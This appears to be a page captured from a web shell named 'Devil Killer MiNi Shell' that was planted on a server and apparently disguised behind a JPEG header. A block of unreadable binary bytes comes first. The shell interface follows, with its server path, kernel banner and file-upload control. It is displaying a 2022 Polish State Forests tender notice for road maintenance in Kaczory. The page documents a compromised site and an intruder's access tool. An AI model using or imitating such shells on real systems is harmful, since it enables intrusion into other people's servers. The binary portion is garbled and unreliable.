JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220706/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220706/0024259001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Utrzymanie i konserwacja dróg na terenie Nadleśnictwa Kaczory </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">LASY PAŃSTWOWE NADLEŚNICTWO KACZORY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570064406</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">KOŚCIELNA 17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kaczory</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-810</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">67 2831461</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">672831462</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kaczory@pila.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kaczory.pila.lasy.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> usługi gospodarki leśnej </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Utrzymanie i konserwacja dróg na terenie Nadleśnictwa Kaczory </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-860c4253-fd64-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00242590</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00223365/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Utrzymanie i konserwacja dróg leśnych w Nadleśnictwie Kaczory w 2022r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.pila.lasy.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu platformy<br/>eZAMAWIAJĄCY oraz poczty elektronicznej z zastrzeżeniem, że składanie ofert odbywa<br/>się wyłącznie poprzez platformę przetargową eZAMAWIAJĄCY.<br/>Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie<br/>zamówienia publicznego, musi posiadać konto na platformie eZamawiający. Wykonawca<br/>posiadający konto na ww. platformie ma dostęp do formularzy: złożenia, zmiany,<br/>wycofania oferty oraz do formularza do komunikacji.<br/>strona internetowa prowadzonego postępowania : https://zamowienia.pila.lasy.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">9.1.Osobami uprawnionymi do porozumiewania się z Wykonawcami są:<br/>p. Wojciech Olejniczak.– w sprawach merytorycznych;<br/>p. Kinga Wyżkiewicz <br/>e- mail: kaczory@pila.lasy.gov.pl<br/>9.2. Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu platformy eZAMAWIAJĄCY oraz poczty elektronicznej z zastrzeżeniem, że składanie ofert odbywa<br/>się wyłącznie poprzez platformę przetargową eZAMAWIAJĄCY.<br/>9.3. Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na platformie eZamawiający. Wykonawca posiadający konto na ww. platformie ma dostęp do formularzy: złożenia, zmiany,wycofania oferty oraz do formularza do komunikacji.<br/>9.4. Ogólne zasady korzystania z Platformy:pod adresem internetowym Platforma eZamawiający - https://zamowienia.pila.lasy.gov.pl/ lub Platforma Zakupowa Marketplanet https://oneplace.marketplanet.pl.<br/>2)Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do<br/>strony Platforma Zakupowa Marketplanet https://oneplace.marketplanet.pl/, gdzie zostanie<br/>powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca<br/>zakłada konto wykonując kroki procesu rejestracyjnego: podaje adres e-mail, ustanawia<br/>hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika<br/>polecenie „zarejestruj się”;<br/>3)rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. <br/>4)po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu oraz<br/>sporządzania, wysyłania i odbierania korespondencji elektronicznej;<br/>5)Ofertę wraz z wymaganymi załącznikami składa się w postaci elektronicznej, opatrzonych<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym<br/>przez osoby umocowane, pod rygorem nieważności na Platformie eZamawiający pod<br/>adresem internetowym: https://zamowienia.pila.lasy.gov.pl/ w zakładce „Oferty”.<br/>9.5. Zamawiający określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie eZamawiający, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512<br/>kb/s;<br/>2) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram,<br/>procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4,<br/>Linux, lub ich nowsze wersje;<br/>3) zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej<br/>w najnowszej wersji, w przypadku Internet Explorer minimalnie wersja 10.0;<br/>4) włączona obsługa JavaScript;<br/>5) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>9.6. Zamawiający określa dopuszczalne formaty przesyłanych danych, tj.: plików o wielkości do<br/>100 MB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, docx, xlsx, csv, jpg, jpeg, tif, png, svg,<br/>zip, tar, gz, gzip, 7z, XAdES, CAdES, PAdES.<br/>9.7. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego,<br/>uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do<br/>Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków,<br/>zawiadomień oraz informacji przekazywanym na adres e-mail Zamawiającego przyjmuje się datę dostarczenia wiadomości na adres e-mail Zamawiającego. W przypadku<br/>skorzystania z Platformy za datę wpływu oświadczeń, wniosków, zawiadomień oraz<br/>informacji przyjmuje się datę ich złożenia/wysłania na Platformie. Oznaczenie czasu<br/>odbioru danych przez Platformę eZamawiający stanowi datę oraz dokładny czas (hh:mm:ss)<br/>generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim źródłem<br/>czasu.<br/>9.10. Wymagania techniczne oraz organizacyjne, dotyczące komunikacji Zamawiającego<br/>z Wykonawcami, zasady funkcjonowania Platformy eZamawiający, a także sposób<br/>składania ofert oraz zamieszczania przez Wykonawców wszelkich oświadczeń, wniosków,<br/>zawiadomień, odwołań oraz informacji określa również Instrukcja dla Wykonawców,dostępna na Platformie eZamawiający w zakładce „Regulacje<br/>i procedury procesu zakupowego”.<br/>Wymagania organizacyjne i techniczne zawiera SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku<br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych<br/>oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych<br/>osobowych)(Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 – dalej „RODO”) Zamawiający<br/>informuje, iż administratorem danych osobowych jest Nadleśnictwo Kaczory.<br/>Klauzula informacyjna dotycząca przetwarzania danych osobowych zawarta jest w rozdziale 19 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Osobie, której dane osobowe zostały pozyskane przez Zamawiającego w związku<br/>z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego nie<br/>przysługuje:<br/>1) prawo do usunięcia danych osobowych, o czym przesadza art. 17 ust. 3 lit. b, d lub<br/>e RODO,<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>określone w art. 21 RODO prawo sprzeciwu wobec przetwarzania danych<br/>osobowych, a to z uwagi na fakt, że podstawą prawną przetwarzania danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Ograniczenia stosowania zawarte są w rozdziale 19 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.2.8.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest robota budowlana polegająca na „Utrzymaniu i konserwacji<br/>dróg w Nadleśnictwie Kaczory”. Szczegółowy opis przedmiotu zamówienia zamieszczono w Załącznikach nr 4, 5, 11 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111213-4 - Roboty w zakresie oczyszczania terenu</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres rzeczowy obejmujący czynności takie same (analogiczne), jak opisane w opisie przedmiotu zamówienia („Opcja”).<br/>Przedmiotem Opcji będą prace analogiczne, jak opisane w SWZ (i wycenione przez<br/>Wykonawcę w kosztorysie ofertowym stanowiącym część Oferty). W ramach Opcji, wedle<br/>wyboru Zamawiającego, mogą zostać zlecone wszystkie, niektóre lub jedna z prac<br/>wskazanych w SWZ (i wycenionych przez Wykonawcę w kosztorysie ofertowym<br/>stanowiącym część Oferty). Zamawiający nie jest zobowiązany do zlecenia prac objętych<br/>przedmiotem Opcji, a Wykonawcy nie służy roszczenie o ich zlecenie. Prace będące<br/>przedmiotem Opcji mogą zostać zlecone w ilości stanowiącej równowartość do 30 %<br/>wartości przedmiotu zamówienia określonej zgodnie z § 6 ust 1 wzoru umowy stanowiącego<br/>załącznik nr 7 do SWZ.<br/>Podstawą określenia wartości prac zleconych w ramach Opcji (w celu określenia jej zakresu)<br/>będą ceny jednostkowe poszczególnych prac zawarte w kosztorysach ofertowym<br/>stanowiących część Oferty.<br/>Zamawiający przewiduje możliwość skorzystania z Opcji w przypadku:<br/>1) wystąpienia potrzeby zwiększenia zakresu rzeczowego robót budowlanych stanowiących przedmiot zamówienia <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">5.1. Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 PZP, w okresie 3 lat od dnia udzielenia zamówienia podstawowego, o wartości do 40 % wartości zamówienia podstawowego. Zamówienia te polegać będą na powtórzeniu<br/>podobnych robót stanowiących przedmiot niniejszego zamówienia, tj. prac z zakresu utrzymania i konserwacji dróg.<br/>5.2. Zamówienia, o których mowa w pkt 5.1. będą polegały na powtórzeniu robót budowlanych<br/>zgodnych z robotami stanowiącymi przedmiot niniejszego zamówienia. Zakresem rzeczowym robót budowlanych stanowiących przedmiot zamówień, o których mowa w pkt 5.1. będą prace z zakresu utrzymania i konserwacji dróg obejmujące czynności wskazane rodzajowo w rozdziale 3 SWZ, w załącznikach nr 4,5,11 do SWZ i czynności wskazane powyżej.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert zamówienia Zamawiający będzie się kierował następującymi kryteriami<br/>oceny ofert:<br/>1) Cena - 60 %,<br/>2) Doświadczenie kierownika budowy - 40 %,<br/>Sposób obliczania punktów dla poszczególnych kryteriów:<br/>1) W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu<br/>wzoru:<br/>Cn<br/>C = ------------ x100 pkt x 60 %<br/>Co<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena brutto za wykonanie<br/>całego zamówienia podana w formularzu Oferty (Załącznik nr 1 do SWZ).<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór<br/>prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z<br/>przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty<br/>dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby<br/>obowiązek rozliczyć zgodnie z tymi przepisami.<br/>2) W ramach kryterium „Doświadczenie Kierownika budowy” Zamawiający dokona<br/>oceny ofert w następujący sposób:<br/>W ramach tego kryterium Zamawiający będzie oceniał doświadczenie Wykonawcy<br/>w zakresie realizacji robót budowlanych określonych w opisie przedmiotu<br/>zamówienia, przy czym wartość 1 (jednej) roboty nie może być niższa niż<br/>100.000,00 zł brutto. Pisząc „1 (jedna) robota” Zamawiający ma na myśli 1 umowę<br/>w ramach której Wykonawca wykonywał lub wykonuje daną robotę budowlaną.<br/>Jeśli Wykonawca wykazuje aktualnie wykonywana robotę, to jako doświadczenie<br/>może wykazać tylko faktycznie zrealizowaną część zamówienia:<br/>- 0 pkt - jeżeli Wykonawca wykaże że Kierownik budowy realizował lub<br/>realizuje przynajmniej 1 robotę budowlaną w zakresie dróg,<br/>- 10 pkt -jeżeli Wykonawca wykaże że Kierownik budowy realizował lub<br/>realizuje przynajmniej 2 roboty budowlane w zakresie dróg,<br/>- 20 pkt - jeżeli Wykonawca wykaże że Kierownik budowy realizował lub<br/>realizuje przynajmniej 3 roboty budowlane w zakresie dróg,<br/>- 30 pkt - jeżeli Wykonawca wykaże że realizował lub realizuje przynajmniej<br/>4 roboty budowlane w zakresie dróg,<br/>- 40 pkt - jeżeli Wykonawca wykaże że realizował lub realizuje przynajmniej<br/>5 i więcej robót budowlanych w zakresie dróg,<br/>Oceny ofert w ramach w/w kryterium Zamawiający będzie dokonywał na<br/>podstawie informacji dotyczących doświadczenia wskazanych w formularzu Oferty<br/>stanowiącym załącznik nr 1 do SWZ. Brak wskazania w formularzu Oferty<br/>stanowiącym załącznik nr 1 do SWZ informacji umożliwiających Zamawiającemu<br/>przyznanie punktów w ramach w/w kryterium spowoduje, że Wykonawca nie<br/>uzyska punktów w tym kryterium.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kierownika budowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1. W postępowaniu mogą brać udział Wykonawcy, którzy nie podlegają wykluczeniu<br/>z postępowania o udzielenie zamówienia w okolicznościach, o których mowa w art. 108 ust.<br/>1 PZP. Na podstawie:<br/>1) art. 108 ust. 1 pkt 1) PZP Zamawiający wykluczy Wykonawcę będącego osobą<br/>fizyczną, którego prawomocnie skazano za przestępstwo:<br/>a) udziału w zorganizowanej grupie przestępczej albo związku mającym na<br/>celu popełnienie przestępstwa lub przestępstwa skarbowego, o którym<br/>mowa w art. 258 ustawy z dnia 6 czerwca 1997 r. Kodeks karny (tekst jedn.<br/>Dz. U. z 2020 r. poz. 1444 z późn. zm. - „KK”),<br/>b) handlu ludźmi, o którym mowa w art. 189a KK,<br/>c) o którym mowa w art. 228-230a, art. 250a Kodeksu karnego, w art. 46-48<br/>ustawy z dnia 25 czerwca 2010 r. o sporcie (Dz. U. z 2020 r. poz. 1133 oraz<br/>z 2021 r. poz. 2054) lub w art. 54 ust. 1-4 ustawy z dnia 12 maja 2011 r. o refundacji leków, środków spożywczych specjalnego przeznaczenia<br/>żywieniowego oraz wyrobów medycznych (Dz. U. z 2021 r. poz. 523,<br/>1292, 1559 i 2054),<br/>d) finansowania przestępstwa o charakterze terrorystycznym, o którym mowa<br/>w art. 165a KK, lub przestępstwo udaremniania lub utrudniania<br/>stwierdzenia przestępnego pochodzenia pieniędzy lub ukrywania ich<br/>pochodzenia, o którym mowa w art. 299 KK,<br/>e) o charakterze terrorystycznym, o którym mowa w art. 115 § 20 KK, lub<br/>mające na celu popełnienie tego przestępstwa,<br/>f) pracy małoletnich cudzoziemców, o którym mowa w art. 9 ust. 2 ustawy z<br/>dnia 15 czerwca 2012 r. o skutkach powierzania wykonywania pracy<br/>cudzoziemcom przebywającym wbrew przepisom na terytorium<br/>Rzeczypospolitej Polskiej (Dz. U. z 2020 poz. 2023),<br/>g) przeciwko obrotowi gospodarczemu, o których mowa w art. 296-307 KK,<br/>przestępstwo oszustwa, o którym mowa w art. 286 KK, przestępstwo<br/>przeciwko wiarygodności dokumentów, o których mowa w art. 270-277d<br/>KK, lub przestępstwo skarbowe,<br/>h) o którym mowa w art. 9 ust. 1 